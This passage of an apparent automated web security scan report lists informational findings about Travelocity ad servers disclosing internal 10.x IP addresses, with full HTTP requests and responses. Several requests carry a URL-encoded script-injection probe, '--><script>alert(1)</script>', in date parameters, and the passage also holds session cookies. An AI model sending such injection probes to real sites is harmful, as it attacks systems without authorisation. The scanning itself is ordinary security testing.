Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:53 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:53 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 119
Content-Type: application/x-javascript

document.write('<img src=\"http://ag.travelocity.com.edgesuite.net/Sponsor_gifs/tvly_default_1x1.gif\" border=\"0\">');

23.29. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:49 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 119
Content-Type: application/x-javascript

document.write('<img src=\"http://ag.travelocity.com.edgesuite.net/Sponsor_gifs/tvly_default_1x1.gif\" border=\"0\">');

23.30. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=25ce20be-be4e-490f-bab0-c4f6b2466f8d&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--%3E%3Cscript%3Ealert(1)%3C/script%3Ec27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0BB8AB8D28C2251561FE46210E602AEC.p0526

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:34 GMT
Server: Apache
SERVICE_HOST: 10.8.5.60
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.31. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=c&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&lob=HOTEL&destination=Boston,%20MA%20Massachusetts&departureDate=20111004&returnDate=20111007&adults=1&glsId=440663 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=5BEB08ED86FCB6AA7FF4A8E2E4DEC466.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.32. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&pti=default&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=2F9959B50366F4CA721965F7F289D37D.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.33. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=29F46A6CB42B71BC5130159228D86761.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.34. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=25ce20be-be4e-490f-bab0-c4f6b2466f8d&pti=default&ctx=21a533cd-b167-4a14-8c05-823e0d876de3&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=ddd7b6d--%3E%3Cscript%3Ealert(1)%3C/script%3Ec27dd7fe78e&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51B9915519ADC9C56D1F581FCA1C58D4.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=EDC2830BC17186D93ACC0D247FE2EC3C.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.35. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=w&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=3e57cdf2-0e89-4497-b33a-80947b77b928&pti=default&ctx=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&widget=H_PopUnder&lob=HT&glsId=440663&departureDate=20111004&returnDate=20111007&adults=1 HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=9DDFD3A477A8E9BCF232C7332ECB0C76.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.36. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=33637923-4b56-4634-b850-17368e8cd432&ppi=3e57cdf2-0e89-4497-b33a-80947b77b928&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ADC4B5E4DE88364BAC2EE60A6BF10D48.p0520

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=9CAEC213CBC2B1BA5C8B7A03299C9C68.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;

23.37. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=D9CA04FC00EAC02591A81617E3DE3913.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.38. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=4eb2c783-b726-4b7f-b2eb-92dc1479cddd&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EC49D47AFF473B50301CAE75DBBA82B.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=67E5C0A7BB6DF5EA8DDFBBBABE6A2042.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4480

function Miwe1() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.39. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=67e8ee2c-a9fa-4168-ac97-3cb991cc9c66&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=33637923-4b56-4634-b850-17368e8cd432&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=B63997506446CC26C3FC5892AAD19536.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.40. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4547

function Miwe2() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http:
...[SNIP]...

23.41. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

